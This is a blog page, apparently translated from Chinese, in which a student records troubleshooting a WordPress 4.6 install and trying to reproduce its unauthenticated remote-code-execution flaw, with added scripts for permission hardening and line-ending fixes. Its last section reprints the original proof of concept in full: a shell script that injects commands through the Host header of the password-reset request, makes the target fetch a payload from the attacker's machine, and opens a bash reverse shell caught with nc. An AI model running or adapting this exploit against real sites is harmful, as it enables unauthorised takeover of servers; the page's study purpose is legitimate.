<!DOCTYPE html>
<html lang="en">
  <head>
    
<meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>


<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />

<meta name="theme-color" content="#f8f5ec" />
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">



  <meta name="description" content="WordPress installation and the 4.6 vulnerability issue"/>




  <meta name="keywords" content="wordpress, poc, 八一" />



  <meta name="baidu-site-verification" content="HhUstaSjr0" />



  <meta name="google-site-verification" content="UA-102975942-1" />






  <link rel="alternate" href="/atom.xml" title="八一">




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=2.6.0" />



<link rel="canonical" href="https://bay1.top/2017/05/06/Wordpress安装及4.6漏洞问题/"/>


<link rel="stylesheet" type="text/css" href="/css/style.css?v=2.6.0" />
<link rel="stylesheet" type="text/css" href="/css/prettify.css" media="screen" />
<link rel="stylesheet" type="text/css" href="/css/sons-of-obsidian.css" media="screen" />



  <link rel="stylesheet" type="text/css" href="/lib/fancybox/jquery.fancybox.css" />




  










    <title> WordPress Installation and the 4.6 Vulnerability Issue - 八一 </title>
  </head>

  <body>

    <div class="container" id="mobile-panel">
      <header id="header" class="header"><div class="logo-wrapper">
  <a href="/." class="logo">八一</a>
</div>


      </header>

      <main id="main" class="main">
        <div class="content-wrapper">
          <div id="content" class="content">
            
  
  <article class="post">
    <header class="post-header">
      <h1 class="post-title">
        
          WordPress Installation and the 4.6 Vulnerability Issue
        
      </h1>

      <div class="post-meta">
        <span class="post-time">
          2017-05-06
        </span>
        
        
        
      </div>
    </header>

    
    
  <div class="post-toc" id="post-toc">
    <h2 class="post-toc-title">Contents</h2>
    <div class="post-toc-content">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#wordpress4-6安装"><span class="toc-text">Installing WordPress 4.6</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#wordpress安装包解压"><span class="toc-text">Unpacking the WordPress archive</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#mysql数据库不能连接-1"><span class="toc-text">Cannot connect to the MySQL database (1)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#mysql数据库不能连接-2"><span class="toc-text">Cannot connect to the MySQL database (2)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#不能更换主题和插件"><span class="toc-text">Cannot change themes or plugins</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#poc的利用"><span class="toc-text">Using the PoC</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#poc出现报错"><span class="toc-text">The PoC throws an error</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#poc修改"><span class="toc-text">Modifying the PoC</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#最后附上歪果仁作者的poc"><span class="toc-text">Finally, the original author's PoC</span></a></li></ol>
    </div>
  </div>


    <div class="post-content">
      
        <p>It feels like every day at school is spent revising for exams... so many exams, and another one every few days!<a id="more"></a> But after the WordPress 4.6 vulnerability was disclosed,<br>I also wanted to feel the satisfaction of reproducing it. However... the preconditions for this PoC are very strict, and I am still a beginner... so I still did not succeed.<br>This post mainly records the problems I ran into while trying to reproduce it.</p>
<h2 id="wordpress4-6安装"><a href="#wordpress4-6安装" class="headerlink" title="Installing WordPress 4.6"></a>Installing WordPress 4.6</h2><blockquote>
<p>My very first blog ran on WordPress, so this is familiar ground for me, and there are plenty of step-by-step guides online.<br>Here is the 4.6 package: <a href="https://wordpress.org/wordpress-4.6.zip" target="_blank" rel="noopener">WordPress4.6.zip</a><br>Below are the problems you may run into during installation.</p>
</blockquote>
<h3 id="wordpress安装包解压"><a href="#wordpress安装包解压" class="headerlink" title="Unpacking the WordPress archive"></a>Unpacking the WordPress archive</h3><blockquote>
<p>Unpacking the archive locally and then copying the files to the VPS is slow; instead, upload the zip and unpack it on the server.<br>Sometimes you want to unpack into a specific directory, e.g. /www/wwwroot/<a href="http://www.flywinky.info/" target="_blank" rel="noopener">www.flywinky.info/</a><br>which you can do with <span style="color: red;">unzip xx.zip -d /www/wwwroot/<a href="http://www.flywinky.info/" target="_blank" rel="noopener">www.flywinky.info/</a></span></p>
</blockquote>
<h3 id="mysql数据库不能连接-1"><a href="#mysql数据库不能连接-1" class="headerlink" title="Cannot connect to the MySQL database (1)"></a>Cannot connect to the MySQL database (1)</h3><blockquote>
<p>I have no idea why this happens every time I set WordPress up.<br>If it says the username or password is wrong, you can do the following.</p>
</blockquote>
<p><strong>First, stop MySQL</strong></p>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo /usr/<span class="built_in">local</span>/mysql/support-<span class="built_in">files</span>/mysql.server <span class="built_in">stop</span></span><br></pre></td></tr></table></figure>
<p><strong>Start it in safe mode</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo mysqld_safe --skip-grant-tables</span><br></pre></td></tr></table></figure>
<p><strong>Log in to MySQL without a password</strong></p>
<p><span style="color: red;">First you need to open another shell and run the following:</span></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mysql -u root</span><br><span class="line">mysql&gt; UPDATE mysql.user SET Password=PASSWORD(<span class="string">'你的新密码'</span>) WHERE User=<span class="string">'用户名'</span>;</span><br></pre></td></tr></table></figure>
<p><strong>Restart MySQL</strong></p>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo /usr/<span class="built_in">local</span>/mysql/support-<span class="built_in">files</span>/mysql.server <span class="built_in">start</span></span><br></pre></td></tr></table></figure>
<h3 id="mysql数据库不能连接-2"><a href="#mysql数据库不能连接-2" class="headerlink" title="Cannot connect to the MySQL database (2)"></a>Cannot connect to the MySQL database (2)</h3><blockquote>
<p>Even after resetting the password, you may find that you no longer remember which database name you created...<br>WordPress setup asks for the database name; you can look it up from the shell as follows.<br><strong>Connect to MySQL</strong></p>
</blockquote>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql -u root -ppassword</span><br></pre></td></tr></table></figure>
<p>Here you may run into the problem shown in the image below; the reason is that <span style="color: red;">there is no space between “-p” and “password”</span><br><img src="https://s1.ax1x.com/2018/01/01/pSfxpD.png" alt="WordPress4.6"></p>
<p><strong>List the database names</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show databases;</span><br></pre></td></tr></table></figure>
<p>PS: <a href="http://www.cnblogs.com/zhangzhu/archive/2013/07/04/3172486.html" target="_blank" rel="noopener">some other database commands</a></p>
<h3 id="不能更换主题和插件"><a href="#不能更换主题和插件" class="headerlink" title="Cannot change themes or plugins"></a>Cannot change themes or plugins</h3><blockquote>
<p>Installing a plugin or theme from the admin panel prompts for FTP credentials.<br>This happens because of file and directory permissions; log in to the VPS and run:</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">chmod -R <span class="number">755</span> /home/wwwroot</span><br><span class="line">chown -R www /home/wwwroot</span><br></pre></td></tr></table></figure>
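<p>The two commands above hand the entire web root to the web-server user and set the execute bit on every file. As an added example (not from the original post), the script below does the same job with least privilege: directories 755, files 644, the code owned by a separate account, and only wp-content (where WordPress writes plugins, themes and uploads) owned by the web-server user. The path /home/wwwroot and the user www come from the post; the code-owner account and the check functions are assumptions, and the checks assume GNU find.</p>

```shell
#!/bin/sh
# Added example, not from the original post. Least-privilege alternative to
#   chmod -R 755 /home/wwwroot ; chown -R www /home/wwwroot
# PHP only needs to write under wp-content; everything else should stay
# read-only for the web-server user so a compromised plugin cannot rewrite core.
# Usage (as root): ./harden_wp.sh /home/wwwroot root www   (paths/users assumed)

# harden_wp <webroot> <code-owner> <web-user>
# Returns 1 if <webroot> does not look like a WordPress install.
harden_wp() {
    root=$1; owner=$2; webuser=$3
    [ -d "$root/wp-content" ] || return 1
    find "$root" -type d -exec chmod 755 {} +      # dirs: rwxr-xr-x
    find "$root" -type f -exec chmod 644 {} +      # files: rw-r--r--, no exec bit
    chown -R "$owner" "$root"                      # code belongs to the admin account
    chown -R "$webuser" "$root/wp-content"         # only uploads/plugins/themes writable
}

# count_loose_perms <webroot>
# Prints how many entries are group- or world-writable; 0 is the goal.
count_loose_perms() {
    find "$1" -perm /022 | wc -l | tr -d ' '
}

# count_exec_files <webroot>
# Prints how many regular files carry any execute bit; a WordPress tree needs none,
# so a non-zero count after hardening is worth investigating.
count_exec_files() {
    find "$1" -type f -perm /111 | wc -l | tr -d ' '
}

if [ "$#" -eq 3 ]; then
    harden_wp "$1" "$2" "$3" || { echo "no wp-content under $1" >&2; exit 1; }
    echo "group/world-writable entries: $(count_loose_perms "$1")"
    echo "executable files:             $(count_exec_files "$1")"
fi
```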
<h2 id="poc的利用"><a href="#poc的利用" class="headerlink" title="Using the PoC"></a>Using the PoC</h2><h3 id="poc出现报错"><a href="#poc出现报错" class="headerlink" title="The PoC throws an error"></a>The PoC throws an error</h3><blockquote>
<p>As shown in the image below, this happens because editing the file on Windows leaves \r (CRLF) line endings, which cause errors on Linux.</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfOk6.png" alt="wordpress4.6-2"></p>
<blockquote>
<p>Strip the ’\r’ with a regular expression, or fix it as follows:</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">yum install dos2unix</span><br><span class="line">dos2unix **.sh</span><br></pre></td></tr></table></figure>
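<p>As an added example (not from the original post), here is the regular-expression route mentioned above as a small shell helper: check a script for Windows line endings first, then strip the trailing \r in place with sed, keeping a backup. The function names are assumptions; it assumes GNU grep and sed, as found on a yum-based Linux system.</p>

```shell
#!/bin/sh
# Added example, not from the original post: sed-based replacement for dos2unix.
# A script saved on Windows ends every line with \r\n; the shell then sees "\r" as
# part of the interpreter path or the command name and fails.

CR=$(printf '\r')   # a literal carriage-return character for grep patterns

# has_crlf <file>: exit 0 if at least one line ends in \r, 1 otherwise.
has_crlf() {
    grep -q "$CR\$" "$1"
}

# count_crlf <file>: print how many lines end in \r.
count_crlf() {
    grep -c "$CR\$" "$1" || true   # grep -c exits 1 when the count is 0
}

# strip_crlf <file>: rewrite the file with LF endings, keeping <file>.bak.
strip_crlf() {
    cp "$1" "$1.bak" && sed -i 's/\r$//' "$1"
}

# Stand-alone usage: ./fix_crlf.sh poc.sh
if [ "$#" -eq 1 ]; then
    if has_crlf "$1"; then
        echo "$1: $(count_crlf "$1") CRLF line(s), converting" >&2
        strip_crlf "$1"
    else
        echo "$1: already LF" >&2
    fi
fi
```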
<h3 id="poc修改"><a href="#poc修改" class="headerlink" title="Modifying the PoC"></a>Modifying the PoC</h3><blockquote>
<p>First, change the host address to the target machine's IP.<br>Then user_login=admin: the admin here must be replaced with a username that actually exists on the target.<br>Also, the target must have exim4 installed.</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt-get install exim4</span><br></pre></td></tr></table></figure>
<blockquote>
<p>Configure it with the command below; at the first prompt choose the first option, “internet site; mail is sent and received directly using SMTP”,<br>then accept the defaults for the rest.</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dpkg-reconfigure exim4-config</span><br></pre></td></tr></table></figure>
<p>PS: <a href="http://www.junerik.com/?p=237" target="_blank" rel="noopener">installing exim4</a></p>
<h2 id="最后附上歪果仁作者的poc"><a href="#最后附上歪果仁作者的poc" class="headerlink" title="Finally, the original author's PoC"></a>Finally, the original author's PoC</h2><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span 
class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br></pre></td><td class="code"><pre><span class="line">rev_host=<span class="string">"192.168.57.1"</span> <span class="comment">##1</span></span><br><span class="line">   <span class="keyword">function</span> <span class="function"><span class="title">prep_host_header</span></span>() &#123;</span><br><span class="line">     cmd=<span class="string">"<span class="variable">$1</span>"</span></span><br><span class="line">     rce_cmd=<span class="string">"\$&#123;run&#123;<span class="variable">$cmd</span>&#125;&#125;"</span>;</span><br><span class="line">     <span class="comment">## replace / with $&#123;substr&#123;0&#125;&#123;1&#125;&#123;$spool_directory&#125;&#125;</span></span><br><span class="line">     <span class="comment">##sed 's^/^$&#123;substr&#123;0&#125;&#123;1&#125;&#123;$spool_directory&#125;&#125;^g'</span></span><br><span class="line">     rce_cmd=<span class="string">"`echo <span 
class="variable">$rce_cmd</span> | sed 's^/^\$&#123;substr&#123;0&#125;&#123;1&#125;&#123;\$spool_directory&#125;&#125;^g'`"</span></span><br><span class="line">     <span class="comment">## replace ' ' (space) with</span></span><br><span class="line">     <span class="comment">##sed 's^ ^$&#123;substr&#123;10&#125;&#123;1&#125;&#123;$tod_log&#125;&#125;$^g'</span></span><br><span class="line">     rce_cmd=<span class="string">"`echo <span class="variable">$rce_cmd</span> | sed 's^ ^\$&#123;substr&#123;10&#125;&#123;1&#125;&#123;\$tod_log&#125;&#125;^g'`"</span></span><br><span class="line">     <span class="comment">##return "target(any -froot@localhost -be $rce_cmd null)"</span></span><br><span class="line">     host_header=<span class="string">"target(any -froot@localhost -be <span class="variable">$rce_cmd</span> null)"</span></span><br><span class="line">     <span class="built_in">return</span> 0</span><br><span class="line">   &#125;</span><br><span class="line">   <span class="comment">##cat exploitbox.ans</span></span><br><span class="line">   intro=<span class="string">"</span></span><br><span class="line"><span class="string">   DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r</span></span><br><span class="line"><span class="string">   bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f</span></span><br><span class="line"><span class="string">   G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c</span></span><br><span class="line"><span class="string">   G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg</span></span><br><span class="line"><span class="string">   IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f</span></span><br><span class="line"><span class="string">   IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f</span></span><br><span class="line"><span class="string">   
X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6</span></span><br><span class="line"><span class="string">   b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb</span></span><br><span class="line"><span class="string">   NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N</span></span><br><span class="line"><span class="string">   TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1</span></span><br><span class="line"><span class="string">   QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz</span></span><br><span class="line"><span class="string">   NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g</span></span><br><span class="line"><span class="string">   G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54</span></span><br><span class="line"><span class="string">   eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb</span></span><br><span class="line"><span class="string">   WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO</span></span><br><span class="line"><span class="string">   TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg</span></span><br><span class="line"><span class="string">   ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb</span></span><br><span class="line"><span class="string">   MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD</span></span><br><span class="line"><span class="string">   G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob</span></span><br><span class="line"><span class="string">   WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz</span></span><br><span class="line"><span class="string">   
NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb</span></span><br><span class="line"><span class="string">   MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f</span></span><br><span class="line"><span class="string">   X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4</span></span><br><span class="line"><span class="string">   bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K"</span></span><br><span class="line">   intro2=<span class="string">"</span></span><br><span class="line"><span class="string">   ICAgICAgICAgICAgICAgICAgIBtbNDRtfCBFeHBsb2l0Qm94LmlvIHwbWzBtCgobWzk0bSsgLS09</span></span><br><span class="line"><span class="string">   fBtbMG0gG1s5MW1Xb3JkcHJlc3MgQ29yZSAtIFVuYXV0aGVudGljYXRlZCBSQ0UgRXhwbG9pdBtb</span></span><br><span class="line"><span class="string">   MG0gIBtbOTRtfBtbMG0KG1s5NG0rIC0tPXwbWzBtICAgICAgICAgICAgICAgICAgICAgICAgICAg</span></span><br><span class="line"><span class="string">   ICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBtChtbOTRtKyAtLT18G1swbSAgICAgICAgICBE</span></span><br><span class="line"><span class="string">   aXNjb3ZlcmVkICYgQ29kZWQgQnkgICAgICAgICAgICAgICAgG1s5NG18G1swbQobWzk0bSsgLS09</span></span><br><span class="line"><span class="string">   fBtbMG0gICAgICAgICAgICAgICAbWzk0bURhd2lkIEdvbHVuc2tpG1swbSAgICAgICAgICAgICAg</span></span><br><span class="line"><span class="string">   ICAgIBtbOTRtfBtbMG0gChtbOTRtKyAtLT18G1swbSAgICAgICAgIBtbOTRtaHR0cHM6Ly9sZWdh</span></span><br><span class="line"><span class="string">   bGhhY2tlcnMuY29tG1swbSAgICAgICAgICAgICAgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBt</span></span><br><span class="line"><span class="string">   ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBt</span></span><br><span class="line"><span class="string">   ChtbOTRtKyAtLT18G1swbSAiV2l0aCBHcmVhdCBQb3dlciBDb21lcyBHcmVhdCBSZXNwb25zaWJp</span></span><br><span class="line"><span class="string">   
bGl0eSIgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBtICAgICAgICAqIEZvciB0ZXN0aW5nIHB1</span></span><br><span class="line"><span class="string">   cnBvc2VzIG9ubHkgKiAgICAgICAgICAbWzk0bXwbWzBtIAoKCg=="</span></span><br><span class="line">   <span class="built_in">echo</span> <span class="string">"<span class="variable">$intro</span>"</span>  | base64 -d</span><br><span class="line">   <span class="built_in">echo</span> <span class="string">"<span class="variable">$intro2</span>"</span> | base64 -d</span><br><span class="line">   <span class="keyword">if</span> [ <span class="string">"<span class="variable">$#</span>#"</span> -ne 1 ]; <span class="keyword">then</span></span><br><span class="line">   <span class="built_in">echo</span> -e <span class="string">"Usage:\n<span class="variable">$0</span> target-wordpress-url\n"</span></span><br><span class="line">   <span class="built_in">exit</span> 1</span><br><span class="line">   <span class="keyword">fi</span></span><br><span class="line">   target=<span class="string">"<span class="variable">$1</span>"</span></span><br><span class="line">   <span class="built_in">echo</span> -ne <span class="string">"\e[91m[*]\033[0m"</span></span><br><span class="line">   <span class="built_in">read</span> -p <span class="string">" Sure you want to get a shell on the target '<span class="variable">$target</span>' ? [y/N] "</span> choice</span><br><span class="line">   <span class="built_in">echo</span></span><br><span class="line">   <span class="keyword">if</span> [ <span class="string">"<span class="variable">$choice</span>"</span> == <span class="string">"y"</span> ]; <span class="keyword">then</span></span><br><span class="line">   <span class="built_in">echo</span> -e <span class="string">"\e[92m[*]\033[0m Guess I can't argue with that... 
Let's get started...\n"</span></span><br><span class="line">   <span class="built_in">echo</span> -e <span class="string">"\e[92m[+]\033[0m Connected to the target"</span></span><br><span class="line">   <span class="comment">## Serve payload/bash script on :80</span></span><br><span class="line">   RCE_exec_cmd=<span class="string">"(sleep 3s &amp;&amp; nohup bash -i &gt;/dev/tcp/<span class="variable">$rev_host</span>/1337 0&lt;&amp;1 2&gt;&amp;1) &amp;"</span></span><br><span class="line">   <span class="built_in">echo</span> <span class="string">"<span class="variable">$RCE_exec_cmd</span>"</span> &gt; rce.txt</span><br><span class="line">   python -mSimpleHTTPServer 80 2&gt;/dev/null &gt;&amp;2 &amp;</span><br><span class="line">   hpid=$!</span><br><span class="line">   <span class="comment">## Save payload on the target in /tmp/rce</span></span><br><span class="line">   cmd=<span class="string">"/usr/bin/curl -o/tmp/rce <span class="variable">$rev_host</span>/rce.txt"</span></span><br><span class="line">   prep_host_header <span class="string">"<span class="variable">$cmd</span>"</span></span><br><span class="line">   curl -H<span class="string">"Host: <span class="variable">$host_header</span>"</span> -s -d <span class="string">'user_login=admin&amp;wp-submit=Get+New+Password'</span> <span class="variable">$target</span>/wp-login.php? 
action=lostpassword <span class="comment">##2</span></span><br><span class="line">   <span class="built_in">echo</span> -e <span class="string">"\n\e[92m[+]\e[0m Payload sent successfully"</span></span><br><span class="line">   <span class="comment">## Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce</span></span><br><span class="line">   cmd=<span class="string">"/bin/bash /tmp/rce"</span></span><br><span class="line">   prep_host_header <span class="string">"<span class="variable">$cmd</span>"</span></span><br><span class="line">   curl -H<span class="string">"Host: <span class="variable">$host_header</span>"</span> -d <span class="string">'user_login=admin&amp;wp-submit=Get+New+Password'</span> <span class="variable">$target</span>/wp-login.php?action=lostpassword &amp; <span class="comment">##3</span></span><br><span class="line">   <span class="built_in">echo</span> -e <span class="string">"\n\e[92m[+]\033[0m Payload executed!"</span></span><br><span class="line">   <span class="built_in">echo</span> -e <span class="string">"\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n"</span></span><br><span class="line">   nc -vv -l 1337</span><br><span class="line">   <span class="built_in">echo</span></span><br><span class="line">   <span class="keyword">else</span></span><br><span class="line">   <span class="built_in">echo</span> -e <span class="string">"\e[92m[+]\033[0m Responsible choice ;)</span></span><br><span class="line"><span class="string"> Exiting.\n"</span></span><br><span class="line">   <span class="built_in">exit</span> 0</span><br><span class="line">   <span class="keyword">fi</span></span><br><span class="line">   <span class="built_in">echo</span> <span class="string">"Exiting..."</span></span><br><span class="line">   <span class="built_in">exit</span> 0</span><br></pre></td></tr></table></figure>
<p>PS: <a href="https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html" target="_blank" rel="noopener">vulnerability and exploit write-up (blocked in mainland China)</a><br><a href="https://www.youtube.com/watch?v=ZFt_S5pQPX0" target="_blank" rel="noopener">PoC demo</a></p>

      
    </div>

    
      
      



      
      
    

    
      <footer class="post-footer">
        
          <div class="post-tags">
            
              <a href="/tags/wordpress/">wordpress</a>
            
              <a href="/tags/poc/">poc</a>
            
          </div>
        
        
        

      </footer>
    

  </article>


          </div>
          
  </div>


        </div>
      </main>

      <footer id="footer" class="footer">

  <div class="social-links">
    
      
        
          <a href="https://github.com/bay1" class="iconfont icon-github" title="github"></a>
        
      
    
      
        
          <a href="http://weibo.com/3190704711/profile?topnav=1&wvr=6&is_all=1" class="iconfont icon-weibo" title="weibo"></a>
        
      
    
      
    
      
    
      
    
    
    
  </div>


<div class="copyright">
  <span class="copyright-year">
    
    &copy; 
     
      2016 - 
    
    2018
    <span class="author">bay1</span>
  </span>
</div>
      </footer>

    </div>

    
  



    
  





  
    <script type="text/javascript" src="/lib/jquery/jquery-3.1.1.min.js"></script>
  

  
    <script type="text/javascript" src="/lib/slideout/slideout.js"></script>
  

  
    <script type="text/javascript" src="/lib/fancybox/jquery.fancybox.pack.js"></script>
  


    <script type="text/javascript" src="/js/src/even.js?v=2.6.0"></script>
<script type="text/javascript" src="/js/src/bootstrap.js?v=2.6.0"></script>
<script src="/js/prettify.js"></script>
<script type="text/javascript">
$(document).ready(function(){
 $('pre').addClass('prettyprint');
   prettyPrint();
 })
</script>
  </body>
</html>
